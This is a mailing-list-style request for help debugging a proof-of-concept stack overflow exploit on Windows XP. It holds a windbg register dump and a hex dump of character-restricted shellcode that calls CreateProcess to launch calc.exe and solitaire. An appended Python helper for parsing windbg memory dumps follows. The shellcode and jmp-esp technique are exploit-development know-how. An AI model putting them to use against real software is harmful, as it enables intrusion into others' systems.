error in my code



I think that I need a beer. I will bet that there is someone on this list that can pinpoint my error in 15 minutes. I will find some way to get them a beer/wine/soft drink if so.

I have found and started to exploit a stack based overflow but am stuck with a simple error in my POC. It is probably a coding error in my call to createprocess or a dumb shit coding error, but I cannot yet find it. I would appreciate someone taking a look at the attached POC and pointing out to me my error.

POC code and details are in the attached text file.

thanks




I have found a stack based overflow that can be exploited with some safe
addresses and two bounces off of a "jmp esp" piece of code. I am designing
a POC to run calc.exe and sol.exe.

The payload size is around 9K+, so I am not trying to conserve bytes and I
cannot use the full ASCII character set, it uses a custom variant of UTF-16.
I want to call createprocess twice, once for calc.exe and once for sol.exe
(solitaire). I then want to C3 return or I can call exitprocess. I setup
the stack for createprocess, create a call to createprocess, and then jmp
to the first call, jmp to second call and then return. Return is C3 or if
I need to change it I will call exitprocess.

I am missing something since the first call to createprocess ends up in the ntdll.dll module (7c91d1d7). I think that I have somehow screwed up the createprocess stack, although I have triple checked its setup.

The code runs fine until I call createprocess.

XP SP2+, DEP is off, no stack guard, the code is executing on the stack
with no problem.

I have deliberately crashed the code at EIP with: F1F1

(780.270): Single step exception - code 80000004 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0013c0dd ecx=0013c1d2 edx=0013c1aa esi=ffffffff edi=0013c0fb
eip=0013c348 esp=0013c1aa ebp=0013c45c iopl=0 nv up ei ng nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000296
0013c348 f1 ???

esp = 00131aaa the top of my createprocess stack
all registers, except esi/eax, point to areas in the stack.

call createprocess at 0013c370 and 0013c3d0 - each reached by jmp 20 / eb 20
return at 0013c440
EIP is at 0013c348 where I used F1F1 to crash it

0013c0b0 20 20 20 20 77 3c 41 62 60 60 70 c3 13 00 90 90 w<Ab``p.....
0013c0c0 90 90 90 90 90 90 90 90 c4 c2 13 00 90 90 90 90 ................
0013c0d0 90 90 d2 c1 13 00 90 90 90 90 90 eb 39 63 3a 5c ............9c:\
0013c0e0 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 windows\system32
0013c0f0 5c 63 61 6c 63 2e 65 78 65 00 00 63 3a 5c 77 69 \calc.exe..c:\wi
0013c100 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 73 ndows\system32\s
0013c110 6f 6c 2e 65 78 65 00 00 00 00 54 5e 83 c6 7e 83 ol.exe....T^..~.
0013c120 c6 7e 83 c6 7e 83 c6 7e 56 5d 44 44 44 44 44 44 .~..~..~V]DDDDDD
0013c130 44 44 44 44 54 5b 43 43 43 43 43 43 43 54 5e 83 DDDDT[CCCCCCCT^.
0013c140 c6 7e 83 c6 7e 56 5c 68 33 33 33 33 58 35 33 33 .~..~V\h3333X533
0013c150 33 33 54 59 44 44 44 44 44 44 44 44 44 44 44 44 33TYDDDDDDDDDDDD
0013c160 44 44 44 44 50 50 50 50 4c 4c 4c 4c 51 44 44 44 DDDDPPPPLLLLQDDD
0013c170 44 44 44 5a 4a 4a 4a 4c 4c 4c 4c 4c 4c 4c 4c 4c DDDZJJJLLLLLLLLL
0013c180 4c 50 50 52 50 50 50 50 53 5f 47 47 47 47 47 47 LPPRPPPPS_GGGGGG
0013c190 47 47 47 47 47 47 47 47 78 65 fb c0 13 00 00 00 GGGGGGGGxe......
0013c1a0 47 47 47 eb 70 90 90 90 90 90 dd c0 13 00 00 00 GGG.p...........
0013c1b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 ................
0013c1c0 00 00 00 00 00 00 00 00 00 00 d2 c1 13 00 d2 c1 ................
0013c1d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0013c1e0 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c1f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c210 90 90 90 90 90 90 90 eb 20 90 90 90 90 90 90 90 ........ .......
0013c220 90 90 90 90 90 90 90 90 90 90 90 78 13 2a 00 00 ...........x.*..
0013c230 98 3b 78 65 90 90 90 90 90 90 47 47 47 47 47 4c .;xe......GGGGGL
0013c240 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 50 68 78 LLLLLLLLLLLLLPhx
0013c250 65 78 65 44 44 58 57 5c 50 44 44 44 44 44 44 44 exeDDXW\PDDDDDDD
0013c260 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0013c270 44 44 44 44 44 44 44 44 44 44 44 44 68 33 33 33 DDDDDDDDDDDDh333
0013c280 33 58 35 33 33 33 33 50 83 ec 58 57 5e 83 c6 78 3X53333P..XW^..x
0013c290 83 c6 37 8b d6 55 5e 83 c6 71 83 c6 36 46 46 46 ..7..U^..q..6FFF
0013c2a0 46 46 56 5d 8b e6 5e 46 46 90 90 90 90 90 90 90 FFV]..^FF.......
0013c2b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c2c0 90 90 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 4c 55 5e ..LLLLLLLLLLLLU^
0013c2d0 83 c6 60 56 5c 5e 46 46 90 4c 4c 4c 4c 4c 4c 4c ..`V\^FF.LLLLLLL
0013c2e0 4c 4c 4c 4c 4c 54 5e 83 c6 50 83 c6 44 56 5d 90 LLLLLT^..P..DV].
0013c2f0 90 54 5e 83 c6 7a 4e 4e 56 5c 5e 4e 4e 90 90 4e .T^..zNNV\^NN..N
0013c300 56 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 VDDDDDDDDDDDDDDD
0013c310 44 50 5e 4e 52 5c 90 90 90 90 90 90 90 90 90 90 DP^NR\..........
0013c320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c340 90 90 90 90 90 90 90 f1 f1 90 eb 20 90 90 90 90 ........... ....
0013c350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c360 90 90 90 90 d0 c3 13 00 90 90 90 90 90 90 90 90 ................
0013c370 e8 67 23 80 7c 90 90 90 90 90 90 90 90 90 90 90 .g#.|...........
0013c380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c3a0 90 90 90 90 90 90 90 90 eb 20 90 90 90 90 90 90 ......... ......
0013c3b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c3c0 90 90 90 90 40 c4 13 00 90 90 90 90 90 90 90 90 ....@...........
0013c3d0 e8 67 23 80 7c 90 90 90 90 90 90 90 90 90 90 90 .g#.|...........
0013c3e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c3f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0013c440 c3 90 90 90 90 90 90 90 90 90 90 90 aa c1 13 00 ................
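As an added example (not code from the post or its attachment), here is a small Python helper for reading a windbg `db` dump like the one above back into a byte map, so the values on the stack can be pulled out as little-endian dwords and the pointers followed to their strings instead of being decoded by hand. The embedded rows are excerpted from the dump in the post, and esp=0013c1aa is taken from the register dump; the byte count per row (16) and the `??` marker for unreadable bytes are assumptions about the windbg output format.

```python
import re
import struct

# Rows excerpted from the windbg "db" dump quoted in the post: enough to cover
# the two path strings and the block that esp points at.
DUMP = r"""
0013c0d0 90 90 d2 c1 13 00 90 90 90 90 90 eb 39 63 3a 5c ............9c:\
0013c0e0 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 windows\system32
0013c0f0 5c 63 61 6c 63 2e 65 78 65 00 00 63 3a 5c 77 69 \calc.exe..c:\wi
0013c100 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 73 ndows\system32\s
0013c110 6f 6c 2e 65 78 65 00 00 00 00 54 5e 83 c6 7e 83 ol.exe....T^..~.
0013c1a0 47 47 47 eb 70 90 90 90 90 90 dd c0 13 00 00 00 GGG.p...........
0013c1b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 ................
0013c1c0 00 00 00 00 00 00 00 00 00 00 d2 c1 13 00 d2 c1 ................
0013c1d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
"""

ESP = 0x0013C1AA  # esp from the register dump in the post

# One "db" row: 8-digit address, then exactly 16 byte columns (assumed), each a
# hex pair or "??" for an unreadable byte. The trailing ASCII column is ignored
# because it can contain spaces and hex-looking characters such as "DD".
_ROW = re.compile(r"^\s*([0-9a-f]{8})((?:\s+(?:[0-9a-f]{2}|\?\?)){16})", re.IGNORECASE)


def parse_db_dump(text):
    """Return a sparse {address: byte} map built from windbg db-style rows."""
    mem = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue  # blank line, register line, or anything else
        base = int(m.group(1), 16)
        for i, tok in enumerate(m.group(2).split()):
            if tok != "??":  # unreadable bytes stay absent from the map
                mem[base + i] = int(tok, 16)
    return mem


def read_dword(mem, addr):
    """Little-endian 32-bit read; KeyError if any byte is outside the dump."""
    return struct.unpack("<I", bytes(mem[addr + i] for i in range(4)))[0]


def read_dwords(mem, addr, count):
    """Read `count` consecutive dwords starting at addr (a stack slice)."""
    return [read_dword(mem, addr + 4 * i) for i in range(count)]


def read_cstring(mem, addr, limit=260):
    """Follow a pointer to a NUL-terminated ASCII string, bounded by `limit`."""
    out = bytearray()
    while len(out) < limit:
        b = mem[addr + len(out)]  # KeyError if the string runs off the dump
        if b == 0:
            return out.decode("ascii", errors="replace")
        out.append(b)
    raise ValueError("no NUL terminator within %d bytes" % limit)


def slots_at_esp(text=DUMP, esp=ESP, count=10):
    """The `count` dwords sitting at esp in the dump, lowest address first."""
    return read_dwords(parse_db_dump(text), esp, count)


if __name__ == "__main__":
    mem = parse_db_dump(DUMP)
    for i, v in enumerate(read_dwords(mem, ESP, 10)):
        print("[esp+0x%02x] %08x" % (4 * i, v))
    # The first slot is a pointer into the same dump; follow it.
    print(read_cstring(mem, read_dword(mem, ESP)))
```

The map is sparse on purpose: a read that touches a byte the dump does not cover raises KeyError rather than silently returning zeros, which is the failure mode you want when checking a hand-built argument block against what the debugger actually shows.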